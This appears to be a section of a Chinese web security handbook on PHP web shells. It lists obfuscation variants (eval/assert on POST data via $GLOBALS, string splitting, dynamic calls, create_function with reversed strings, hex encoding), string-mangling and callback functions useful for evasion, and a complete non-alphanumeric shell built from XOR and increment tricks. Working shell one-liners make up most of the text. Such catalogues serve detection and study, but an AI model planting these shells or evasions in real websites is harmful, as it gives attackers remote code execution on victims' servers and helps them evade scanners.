4.1.7. WebShell¶
4.1.7.1. 常见变形¶
-
-
GLOBALS
-
eval($GLOBALS['_POST']['op']);
-
-
-
eval($_FILE['name']);
$_FILE
-
-
-
拆分
-
assert(${"_PO"."ST"} ['sz']);
-
-
-
动态函数执行
-
$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
-
-
-
create_function
-
$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
-
- preg_replace
- rot13
- base64
-
-
进制转化
-
"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
-
-
-
利用文件名
-
__FILE__
-
4.1.7.2. 字符串变形函数¶
- ucwords
- ucfirst
- trim
- substr_replace
- substr
- strtr
- strtoupper
- strtolower
- strtok
- str_rot13
4.1.7.3. 回调函数¶
- call_user_func_array
- call_user_func
- array_filter
- array_walk
- array_map
- registregister_shutdown_function
- register_tick_function
- filter_var
- filter_var_array
- uasort
- uksort
- array_reduce
- array_walk
- array_walk_recursive
4.1.7.4. 特殊字符Shell¶
PHP的字符串可以在进行异或、自增运算的时候,会直接进行运算,故可以使用特殊字符来构成Shell。
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___(base64_decode($_[_]));